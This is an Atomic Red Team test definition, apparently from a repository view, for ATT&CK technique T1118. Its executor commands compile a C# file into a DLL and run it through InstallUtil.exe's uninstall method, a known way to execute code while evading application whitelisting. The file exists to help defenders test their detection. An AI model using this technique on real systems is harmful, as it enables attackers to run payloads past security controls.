Files
atomic-red-team/atomics/T1118/T1118.yaml
T
2018-05-23 17:09:04 -06:00

20 lines
563 B
YAML

attack_technique: T1118
display_name: InstallUtil
atomic_tests:
- name: InstallUtil uninstall method call
description: |
Executes the Uninstall Method
supported_platforms:
- windows
input_arguments:
filename:
description: location of the payload
type: Path
default: T1118.dll
executor:
name: command_prompt
command: |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library T1118.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U #{filename}